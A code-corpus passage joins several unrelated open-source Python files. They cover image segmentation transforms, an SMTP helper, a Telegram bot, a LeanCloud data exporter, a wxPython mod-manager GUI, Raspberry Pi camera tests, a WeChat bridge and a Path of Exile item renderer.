sample1['mask_arr'] = self.flip_image(sample1['mask_arr'], flip_flags_xyd[1])
if 'labels_arr' in sample0:
sample0['labels_arr'] = self.flip_image(sample0['labels_arr'], flip_flags_xyd[0])
sample1['labels_arr'] = self.flip_image(sample1['labels_arr'], flip_flags_xyd[1])
if 'xf_cv' in sample0:
# False -> 1, True -> -1
flip_scale_xy = flip_flags_xyd[:, :2] * -2 + 1
# Negative scale factors need to be combined with a translation whose value is (image_size - 1)
# Mask the translation with the flip flags to only apply it where flipping is done
flip_xlat_xy = flip_flags_xyd[:, :2] * (np.array([sample0['image_arr'].shape[:2][::-1],
sample1['image_arr'].shape[:2][::-1]]).astype(float) - 1)
hv_flip_xf = affine.identity_xf(2)
hv_flip_xf[flip_flags_xyd[:, 2]] = hv_flip_xf[flip_flags_xyd[:, 2], ::-1, :]
xf01 = np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0)
xf01 = affine.cat_nx2x3(
hv_flip_xf,
affine.translation_matrices(flip_xlat_xy),
affine.scale_matrices(flip_scale_xy),
xf01,
)
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return (sample0, sample1)
class SegCVTransformNormalizeToTensor (SegTransform):
def __init__(self, mean, std):
self.mean = mean
self.std = std
def transform_single(self, sample):
sample = sample.copy()
# Convert image to float
image = img_as_float(sample['image_arr'])
if image.shape[2] == 4:
# Has alpha channel introduced by padding
# Split the image into RGB/alpha
alpha_channel = image[:, :, 3:4]
image = image[:, :, :3]
# Account for the alpha during standardisation
if self.mean is not None and self.std is not None:
image = (image - (self.mean[None, None, :] * alpha_channel)) / self.std[None, None, :]
else:
# Standardisation
if self.mean is not None and self.std is not None:
image = (image - self.mean[None, None, :]) / self.std[None, None, :]
# Convert to NCHW tensors
assert image.shape[2] == 3
sample['image'] = image.transpose(2, 0, 1).astype(np.float32)
del sample['image_arr']
if 'labels_arr' in sample:
sample['labels'] = sample['labels_arr'][None, ...].astype(np.int64)
del sample['labels_arr']
if 'mask_arr' in sample:
sample['mask'] = img_as_float(sample['mask_arr'])[None, ...].astype(np.float32)
del sample['mask_arr']
return sample
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Convert image to float
image0 = img_as_float(sample0['image_arr'])
image1 = img_as_float(sample1['image_arr'])
if image0.shape[2] == 4:
# Has alpha channel introduced by padding
# Split the image into RGB/alpha
alpha_channel0 = image0[:, :, 3:4]
image0 = image0[:, :, :3]
alpha_channel1 = image1[:, :, 3:4]
image1 = image1[:, :, :3]
# Account for the alpha during standardisation
if self.mean is not None and self.std is not None:
image0 = (image0 - (self.mean[None, None, :] * alpha_channel0)) / self.std[None, None, :]
image1 = (image1 - (self.mean[None, None, :] * alpha_channel1)) / self.std[None, None, :]
else:
# Standardisation
if self.mean is not None and self.std is not None:
image0 = (image0 - self.mean[None, None, :]) / self.std[None, None, :]
image1 = (image1 - self.mean[None, None, :]) / self.std[None, None, :]
# Convert to NCHW tensors
if image0.shape[2] != 3:
raise ValueError('image0 should have 3 channels, not {}'.format(image0.shape[2]))
if image1.shape[2] != 3:
raise ValueError('image1 should have 3 channels, not {}'.format(image1.shape[2]))
assert image1.shape[2] == 3
sample0['image'] = image0.transpose(2, 0, 1).astype(np.float32)
sample1['image'] = image1.transpose(2, 0, 1).astype(np.float32)
del sample0['image_arr']
del sample1['image_arr']
if 'mask_arr' in sample0:
sample0['mask'] = img_as_float(sample0['mask_arr'])[None, ...].astype(np.float32)
sample1['mask'] = img_as_float(sample1['mask_arr'])[None, ...].astype(np.float32)
del sample0['mask_arr']
del sample1['mask_arr']
if 'labels_arr' in sample0:
sample0['labels'] = sample0['labels_arr'][None, ...].astype(np.int64)
sample1['labels'] = sample1['labels_arr'][None, ...].astype(np.int64)
del sample0['labels_arr']
del sample1['labels_arr']
return (sample0, sample1)
``` |
{
"source": "Joker-ph/UIAutoDemo",
"score": 3
} |
#### File: UIAutoDemo/models/mail.py
```python
from seldom import SMTP
import time
# 配置e-mail信息
# user = '<EMAIL>' # 发送者邮件账号
# password = '<PASSWORD>' # 发送者邮件授权码
# host = 'smtp.126.com' # host路径
# to = '<EMAIL>' # 邮件接收者,如有多个','英文逗号分割
# subject = None
def sendMail(user, password, host, to, subject=None):
try:
smtp = SMTP(user=user, password=password, host=host)
time.sleep(3)
smtp.sender(to=to, subject=subject)
except Exception as error:
return error
``` |
{
"source": "JokerQyou/bot",
"score": 2
} |
#### File: bot/botcommands/pi.py
```python
from config import pi_command
@pi_command
def pi(msg=None, debug=False):
pass
```
#### File: JokerQyou/bot/operations.py
```python
import json
import telegram
from rq.decorators import job
from redis_wrap import SYSTEMS
import config
import botcommands
from utils import *
bot = None
@job('reply', connection=SYSTEMS['default'], result_ttl=5)
def handle_update(update, telegram_bot=None):
global bot
if telegram_bot is None:
print 'no bot'
bot = telegram.Bot(token=config.TOKEN)
else:
bot = telegram_bot
message = update.message
# Save conversation info
conversations = config.get('conversations')
str_chat_id = smart_text(message.chat_id)
if message.left_chat_participant is not None:
if smart_text(
message.left_chat_participant.name[1:]
) == config.__name__:
del conversations[str_chat_id]
return
# Store chat info if it does not exist
if str_chat_id not in conversations:
if isinstance(message.chat, (telegram.User, )):
conversations[str_chat_id] = message.chat.name
elif isinstance(message.chat, (telegram.GroupChat, )):
conversations[str_chat_id] = message.chat.title
else:
# Update chat info if it changed
if isinstance(message.chat, (telegram.User, ))\
and smart_text(
message.chat.name
) != smart_text(conversations[str_chat_id]):
conversations[str_chat_id] = message.chat.name
elif isinstance(message.chat, (telegram.GroupChat, ))\
and smart_text(
message.chat.title
) != smart_text(conversations[str_chat_id]):
conversations[str_chat_id] = message.chat.title
if message.text:
text = message.text.strip()
if text.startswith('/'):
handle_command(text, message)
else:
handle_text(text, message)
elif message.photo:
pass
elif message.video:
pass
elif message.document:
pass
elif message.audio:
pass
elif message.location:
pass
def handle_command(text, message, debug=False):
# Admins can toggle debug mode for commands
if '/debug' in text \
and message.from_user.name in config.get('admins'):
debug = True
if '@' in text and config.__name__ not in text.split('@'):
return
command, options, words = extract_texts(message.text)
if not smart_text(command).isalnum():
return send_reply(text='机器人酱并不懂你发的那是什么玩意', message=message)
if command in ('ls', 'help', ):
return send_reply(text=list_commands(message, debug=debug),
message=message)
if hasattr(botcommands, command):
result = getattr(botcommands, command)(message, debug=debug)
if result is not None:
return send_reply(text=result, message=message)
if debug:
text = u'%s 命令现在并没有什么卯月' % command
send_reply(text=text, message=message)
@job('reply', connection=SYSTEMS['default'], result_ttl=5)
def handle_pi_command(msg_payload, telegram_bot=None):
global bot
if telegram_bot is None:
bot = telegram.Bot(token=config.TOKEN)
else:
bot = telegram_bot
try:
msg = json.loads(msg_payload)
reply_to = telegram.Message.de_json(msg['reply_to'])
return send_reply(text=msg.get('text', None),
photo=msg.get('photo', None),
emoji=msg.get('emoji', None),
audio=msg.get('audio', None),
video=msg.get('video', None),
location=msg.get('location', None),
message=reply_to)
except Exception:
try:
return send_plain_text(
text=msg.get('text', None),
photo=msg.get('photo', None),
message=reply_to
)
except Exception:
print extract_traceback()
def list_commands(msg, debug=False):
'''List all commands available'''
commands = []
for command in dir(botcommands):
attr = getattr(botcommands, command)
if callable(attr):
commands.append('%s - %s\n' % (command, attr.func_doc, ))
commands.append('help - 列出所有可用的命令')
return ''.join(commands)
def handle_text(text, message):
text = u'%s: %s' % (u'复读机', text, )
# send_reply(text=text, message=message)
def send_plain_text(text=None, photo=None, message=None, reply=True):
if photo and 'http' in photo:
content = photo
elif text:
content = text
bot.sendChatAction(chat_id=message.chat_id,
action='typing')
bot.sendMessage(message.chat_id,
smart_text(content),
reply_to_message_id=message.message_id)
def send_reply(text=None, photo=None, emoji=None,
audio=None, video=None, fileobj=None,
location=None, message=None, reply=True):
if not message:
raise RuntimeError('Dont know the chat id')
# Currently text reply is the only supported type
action = 'typing'
if photo:
action = 'upload_photo'
bot.sendChatAction(chat_id=message.chat_id,
action=action)
bot.sendPhoto(message.chat_id,
photo,
reply_to_message_id=message.message_id)
return
elif audio:
action = 'upload_audio'
elif video:
action = 'upload_video'
elif fileobj:
action = 'upload_document'
elif location:
action = 'find_location'
bot.sendChatAction(chat_id=message.chat_id,
action=action)
bot.sendMessage(message.chat_id,
smart_text(text),
reply_to_message_id=message.message_id)
``` |
{
"source": "JokerQyou/env.data",
"score": 3
} |
#### File: JokerQyou/env.data/export.py
```python
import csv
from datetime import datetime
import os
import sys
import click
from dotenv import load_dotenv
import leancloud
from loguru import logger
load_dotenv()
logger.remove()
logger.add(
sys.stdout,
format='<green>{time:YYYY-MM-DD HH:mm:ss}</green> <level>{level: <8}</level> <level>{message}</level>',
level='INFO',
)
def export_month_data(year, month):
start = datetime(year, month, 1)
if month == 12: # Last month of the year
end = datetime(year + 1, 1, 1)
else:
end = datetime(year, month + 1, 1)
EnvSnap = leancloud.Object.extend('EnvSnap')
logger.info('Querying {} data in range of [{}, {})', 'EnvSnap', start, end)
query = EnvSnap.query
query.greater_than_or_equal_to('createdAt', start)
query.less_than('createdAt', end)
query.add_ascending('createdAt')
data_count = query.count()
if data_count:
logger.info('{} rows of data', data_count)
else:
logger.info('No data for {:04d}-{:02d}', year, month)
return
# Pagination
data = []
query.limit(1000)
while len(data) < data_count:
query.skip(len(data))
new_data = query.find()
logger.info('Fetched {} rows of data', len(new_data))
data.extend(new_data)
foldername = os.path.join('{:04d}'.format(year), '{:02d}'.format(month))
logger.info('Data will be saved to {}', foldername)
if not os.path.isdir(foldername):
os.makedirs(foldername)
for target in ('temperature', 'pressure', 'humidity'):
filename = os.path.join(foldername, '{}.csv'.format(target))
with open(filename, 'w', newline='') as wf:
writer = csv.writer(wf)
writer.writerow(['Timestamp', target.capitalize()]) # Header
for item in data:
writer.writerow([
item.created_at.timestamp(),
item.get(target),
])
logger.info('{} data saved to {}', target.capitalize(), filename)
@click.command()
@click.argument('year', type=int, required=True)
@click.argument('month', type=int, required=True)
@click.option('--appid', required=True, envvar='APP_ID')
@click.option('--appkey', required=True, envvar='APP_KEY')
@click.option('--username', required=True, envvar='L_USER')
@click.option('--password', required=True, envvar='L_PAWD')
def main(year, month, appid, appkey, username, password):
leancloud.init(appid, appkey)
user = leancloud.User()
user.login(username, password)
logger.info('User login OK')
export_month_data(year, month)
user.logout()
logger.info('User logged out')
if __name__ == '__main__':
main()
``` |
{
"source": "JokerQyou/ModderZ",
"score": 2
} |
#### File: modder/gui/app.py
```python
from queue import Empty
import threading
import wx
import modder
import modder.manager
from .trayicon import TrayIcon
class ModderGuiApp(wx.App):
def OnInit(self):
modder.GUI_MODE = True
self._manager = modder.manager.ModManager()
self._tray = TrayIcon()
self._timer_stop_event = threading.Event()
self._timer_thread = modder.TimerThread(modder.EVENT_QUEUE, self._timer_stop_event)
self._timer_thread.daemon = True
self._timer_thread.start()
self._modder_thread = threading.Thread(
target=self._process_mod_event_queue, name='Modder.wxApp.ModderThread'
)
self._modder_thread.daemon = True
modder.EVENT_QUEUE.put_nowait(('Modder.Started', None))
self._modder_thread.start()
return True
def _process_mod_event_queue(self):
while 1:
try:
event_name, event_data = modder.EVENT_QUEUE.get(timeout=1)
except Empty:
pass
else:
self._manager.trigger(event_name, data=event_data)
def OnExit(self):
self._timer_stop_event.set()
self._manager.trigger('Modder.BeforeQuit')
return 0
```
#### File: gui/graph/models.py
```python
import numpy as N
import wx
from wx.lib.floatcanvas import FloatCanvas as FC
from wx.lib.floatcanvas.Utilities import BBox
class MovingObjectMixin:
"""
Methods required for a Moving object
"""
def GetOutlinePoints(self):
BB = self.BoundingBox
OutlinePoints = N.array(
(
(BB[0, 0], BB[0, 1]),
(BB[0, 0], BB[1, 1]),
(BB[1, 0], BB[1, 1]),
(BB[1, 0], BB[0, 1]),
)
)
return OutlinePoints
class ConnectorObjectMixin:
"""
Mixin class for DrawObjects that can be connected with lines
Note that this versionony works for Objects that have an "XY" attribute:
that is, one that is derived from XHObjectMixin.
"""
def GetConnectPoint(self, other=None):
return self.XY
class CanvasMixin(object):
def __init__(self, *args, **kwargs):
self._CanvasSet = False
def SetupCanvasMixin(self):
wx.CallAfter(self._SetupCanvasMixin)
def _SetupCanvasMixin(self):
if not self._CanvasSet:
self.Moving = False
self.Canvas.Bind(FC.EVT_MOTION, self.OnMove)
self.Canvas.Bind(FC.EVT_LEFT_UP, self.OnLeftUp)
self.Canvas.ZoomToBB()
def ObjectHit(self, object):
if not self.Moving:
self.Moving = True
self.StartPoint = object.HitCoords
self.MovingObject = object
def OnMove(self, event):
"""
Updates the status bar with the world coordinates
and moves the object it is clicked on
"""
if self.Moving:
# Draw the Moving Object:
self.MovingObject.Move(event.Coords - self.StartPoint)
self.StartPoint = event.Coords
self.Canvas.Draw(True)
def OnLeftUp(self, event):
if self.Moving:
self.Moving = False
class Block(FC.Rectangle, MovingObjectMixin, ConnectorObjectMixin):
"""
Block Object that can be moved
"""
def __init__(
self, XY, WH, Text,
LineColor='BlockBorderColor', LineStyle='Transparent', LineWidth=4,
FillColor='BlockBackgroundColor', FillStyle='Solid',
InForeground=False, FontFamily='Monaco'
):
self.__LineWidth = LineWidth
self.__LineColor = LineColor
self.__LineStyle = LineStyle
self.__FillColor = FillColor
self.__FillStyle = FillStyle
self.Text = Text
self.__Font = wx.Font(
wx.FontInfo(18).FaceName(FontFamily).Family(wx.FONTFAMILY_SCRIPT)
)
if not self.__Font.IsOk():
self.__Font = wx.Font(wx.FontInfo(18))
print('Font fallbacked')
FC.Rectangle.__init__(
self, XY, WH,
LineColor=self.__LineColor, LineStyle=self.__LineStyle,
LineWidth=self.__LineWidth, FillColor=self.__FillColor,
FillStyle=self.__FillStyle, InForeground=False
)
def _Draw(self, dc, WorldToPixel, ScaleWorldToPixel, HTdc=None):
super()._Draw(dc, WorldToPixel, ScaleWorldToPixel, HTdc=HTdc)
gc = wx.GraphicsContext.Create(dc)
gc.SetFont(self.__Font, wx.TheColourDatabase.Find('TextColor'))
# FIXME currently only support single line, no layout engine yet
text_w, text_h = gc.GetTextExtent(self.Text)
# print('text extent:', text_w, text_h)
X, Y = WorldToPixel(self.XY)
W, H = ScaleWorldToPixel(self.WH)
# this is the top left point of the text
text_x = X + self.__LineWidth + (W - self.__LineWidth * 2 - text_w) / 2
text_y = Y + self.__LineWidth + (H - self.__LineWidth * 2 - text_h) / 2
gc.DrawText(self.Text, text_x, text_y)
def GetConnectPoint(self, other=None):
x, y = self.XY
w, h = self.WH
center_x, center_y = (x + w / 2, y + h / 2)
# Can't really tell
if other is None:
return (center_x, center_y)
else:
other_x = other.GetConnectPoint()[0]
if other_x >= center_x:
# other block is at the right side
return x + w, center_y
else:
# other block is at the left side
return x, center_y
def OnHover(self, obj):
self.SetLineStyle('Solid')
self.SetLineColor('BlockHoverBorderColor')
if self._Canvas:
self._Canvas.Draw(True)
def OffHover(self, obj):
self.SetLineStyle(self.__LineStyle)
self.SetLineColor(self.__LineColor)
if self._Canvas:
self._Canvas.Draw(True)
class ConnectorLine(FC.LineOnlyMixin, FC.DrawObject,):
"""
A Line that connects two objects --
it uses the objects to get its coordinates
"""
# fixme: this should be added to the Main FloatCanvas Objects some day.
def __init__(self, Object1, Object2,
LineColor="ConnectorLineColor", LineStyle="Solid",
LineWidth=4, InForeground=False):
FC.DrawObject.__init__(self, InForeground=InForeground)
self.Object1 = Object1
self.Object2 = Object2
self.LineColor = LineColor
self.LineStyle = LineStyle
self.LineWidth = LineWidth
self.CalcBoundingBox()
self.SetPen(LineColor, LineStyle, LineWidth)
self.HitLineWidth = max(LineWidth, self.MinHitLineWidth)
def CalcBoundingBox(self):
self.BoundingBox = BBox.fromPoints(
(
self.Object1.GetConnectPoint(self.Object2),
self.Object2.GetConnectPoint(self.Object1)
)
)
if self._Canvas:
self._Canvas.BoundingBoxDirty = True
def _Draw(self, dc, WorldToPixel, ScaleWorldToPixel, HTdc=None):
p0 = self.Object1.GetConnectPoint(self.Object2)
p3 = self.Object2.GetConnectPoint(self.Object1)
# We'll use a dead simple way to get the two control points:
# The control points p1 and p2 are on the lines
# perpendicular to the borders through points p0 and p3.
# That's said,
# p1 is on the line perpendicular to the border through p0,
# and p2 for p3.
dx = p0[0] - p3[0]
left_point, right_point = (p0, p3) if dx < 0 else (p3, p0)
# dy = left_point[1] - right_point[1]
dx_abs = N.abs(dx)
# dy_abs = N.abs(dy)
# p1_y = left_point[1] + dy_abs * .2 if dy > 0 else left_point[1] - dy_abs * .2
# p2_y = right_point[1] - dy_abs * .2 if dy > 0 else right_point[1] + dy_abs * .2
p1_y = left_point[1]
p2_y = right_point[1]
p1 = (left_point[0] + dx_abs * .4), p1_y
p2 = (right_point[0] - dx_abs * .4), p2_y
Points = N.array(
(left_point, p1, p2, right_point)
)
Points = WorldToPixel(Points)
dc.SetPen(self.Pen)
# dc.DrawLines(Points)
dc.DrawSpline(Points)
if HTdc and self.HitAble:
HTdc.SetPen(self.HitPen)
# HTdc.DrawLines(Points)
HTdc.DrawSpline(Points)
``` |
{
"source": "JokerQyou/oled-clock",
"score": 3
} |
#### File: oled-clock/oled_clock/base.py
```python
class Object(dict):
def __init__(self, d):
super(Object, self).__init__()
self.update(d)
def __setattr__(self, name, value):
self[name] = value
def __getattr__(self, name):
return self[name]
``` |
{
"source": "JokerQyou/openfaas-mobot",
"score": 2
} |
#### File: openfaas-mobot/mobot/handler.py
```python
from io import open
import json
from loguru import logger
from telegram import Bot, Update
from telegram.ext import Dispatcher
from .bot import handlers
with open('/var/openfaas/secrets/mobot-telegram-bot-token') as rf:
bot = Bot(token=rf.read())
dispatcher = Dispatcher(bot, None, workers=0, use_context=True)
# Register handlers
for handler in handlers:
dispatcher.add_handler(handler)
def handle(event, context):
try:
update = Update.de_json(json.loads(event.body), bot)
except:
return {'statusCode': 400}
else:
dispatcher.process_update(update)
return {'statusCode': 200}
``` |
{
"source": "JokerQyou/pitools",
"score": 2
} |
#### File: pitools/examples/server.py
```python
from __future__ import unicode_literals
from flask import Flask
from pitools import camera
from pitools.sensors import bmp085
app = Flask(__name__)
app.register_blueprint(camera.blueprint)
app.register_blueprint(bmp085.blueprint, url_prefix='/sensors')
def serve():
app.run('0.0.0.0', 9876)
if __name__ == '__main__':
serve()
```
#### File: pitools/tests/test_camera.py
```python
from __future__ import unicode_literals
import io
import imghdr
import unittest
from flask import Flask
from pitools import camera
from picamera import PiCamera
app = Flask(__name__)
app.register_blueprint(camera.blueprint)
class CameraTestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def test_01_setup_camera(self):
'''
setup_camera() shoud return an opened PiCamera instance
'''
with camera.setup_camera() as c:
assert isinstance(c, PiCamera)
assert not c.closed
def test_02_post_shot_api(self):
'''
Should fail with 405 with POST requests
'''
rv = self.app.post('/camera/shot')
assert 405 == rv.status_code
def test_03_get_shot_api(self):
'''
Should return an image with MIME of image/*
'''
rv = self.app.get('/camera/shot')
assert rv.content_type.startswith('image/')
print dir(rv)
with io.BytesIO() as photo:
photo.write(rv.get_data())
photo.flush()
photo.seek(0)
assert len(photo.read()) > 0
photo.seek(0)
assert 'jpeg' == imghdr.what('', photo.read())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JokerQyou/Wegram",
"score": 2
} |
#### File: Wegram/wegram/cli.py
```python
from __future__ import unicode_literals, print_function
import os
import logging
import json
os.environ['WEGRAM_FORWARD_TYPES'] = json.dumps([
1, 3, 34, 42, 47, 49, 62,
])
if os.environ.get('ETH0_PUSH_CODE', None):
from .base import Eth0Adapter
TELEGRAM_ADAPTER = Eth0Adapter(os.environ['ETH0_PUSH_CODE'])
elif os.environ.get('TELEGRAM_BOT_TOKEN', None):
from .base import TelegramBotAdapter
TELEGRAM_ADAPTER = TelegramBotAdapter(os.environ['TELEGRAM_BOT_TOKEN'])
else:
raise RuntimeError('No Telegram adapter could be inited')
from weixinbot import weixin
def start():
# Logging to console
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
# Weixin bot init
wxbot = weixin.WebWeixin()
wxbot.telegram_adapter = TELEGRAM_ADAPTER
wxbot.start()
if __name__ == '__main__':
start()
``` |
{
"source": "jokerServer/PoE.py",
"score": 2
} |
#### File: PoE.py/poe/utils.py
```python
import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class that lets me handle moving around the image quite well
# also get around the hassle of maintaining position and adding and subtracting.
def strip_unicode(text: str):
return ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))
class Cursor:
def __init__(self, x_start):
self.x = 0
self.y = 0
self.x_start = x_start
# Return current pos of cursor
@property
def pos(self):
return self.x, self.y
def move_x(self, quantity):
self.x += quantity
def move_y(self, quantity):
self.y += quantity
def reset_x(self):
self.x = self.x_start
# Cause relative paths are ass
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
try:
with open(f"{_dir}/keystones.json") as f:
keystones = js.load(f)
with open(f"{_dir}/ascendancy.json") as f:
asc_nodes = js.load(f)
with open(f"{_dir}/items.json") as f:
items = js.load(f)
except Exception:
pass
def unescape_to_list(props, ret_matches=False):
matches = reg.findall(props)
has_table = Soup(html.unescape(props)).select_one('table.mw-collapsed tr')
if not has_table:
for match in set(matches):
if '|' in match:
props = props.replace(match, match.split('|')[1].strip(']]'))
else:
props = props.replace(match, match.strip('[[]]'))
prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
else:
# FIXME: non-iterable object
prop_list = [x.text for x in has_table]
if ret_matches:
return prop_list, matches
return prop_list
class ItemRender:
def __init__(self, flavor):
self.flavor = flavor.lower()
self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
self.shaper_backgrounds = {
('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
}
self.elder_backgrounds = {
('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
}
# A namedtuple to handle properties.
# This works fairly well except for Separators which is kinda hacky
self.prop = namedtuple('Property', ['title', 'text', 'color'])
# I don't know why PIL does this, but spacing with fonts is not consistent,
# this means I have to compensate by spacing more after separators and stuff
self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
height = 0
last_sep = False
for stat in stats:
if stat.title == "Separator":
height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
last_sep = True
continue
elif stat.title == "Elemental Damage:":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
last_sep = False
elif stat.title == "Requires":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for attr in stat.text.keys():
stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
last_sep = False
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
ht = LINE_SPACING
for line in stat.text:
w = self.lore_font.getsize(line)
ht += STAT_HEIGHT
if w[0] > width:
width = w[0]
height += ht + STAT_SPACING
else:
w = self.lore_font.getsize(stat.text)
if w[0] > width:
width = w[0]
height += STAT_HEIGHT
last_sep = False
continue
elif stat.title == "Image":
height += stat.text.size[1] + IMAGE_PADDING
last_sep = False
else:
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = f"{stat.title}{stat.text}"
last_sep = False
if stat.title != "Image":
# FIXME: referenced before assignment
w = self.font.getsize(stat_text)
else:
w = stat.text.size
if w[0] > width:
width = w[0]
# 34 is the 17px padding from both sides
return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
stats = list()
separator = self.prop("Separator", None, None)
if not isinstance(item, PassiveSkill):
if 'weapon' in item.tags:
stats.append(self.prop(item.item_class, '', DESC_COLOR))
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.physical_damage:
stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
elements = {
element.split('_')[0]: getattr(item, element) for element in [
'fire_damage', 'cold_damage', 'lightning_damage'
] if getattr(item, element)
}
if elements:
stats.append(self.prop("Elemental Damage:", elements, None))
if item.chaos_damage:
stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
if item.critical_chance:
stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
if item.attack_speed:
stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
if int(item.range):
stats.append(self.prop("Weapon Range: ", item.range, None))
stats.append(separator)
elif 'armour' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.block:
stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
if item.armour:
stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
if item.evasion:
stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
if item.energy_shield:
stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
stats.append(separator)
elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
stats.append(separator)
elif 'gem' in item.tags:
stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
if item.stats_per_level[0]['mana multiplier']:
stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
if item.radius:
stats.append(self.prop("Radius: ", item.radius, None))
if not item.is_aura:
# Enlighten Enhance etc only go up to 10
try:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
)
except KeyError:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
)
else:
stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
# Enlighten Enhance etc only go up to 10
try:
if item.stats_per_level[20]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[20]['stored uses']}, None))
except KeyError:
if item.stats_per_level[10]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[10]['stored uses']}, None))
if item.stats_per_level[0]['cooldown']:
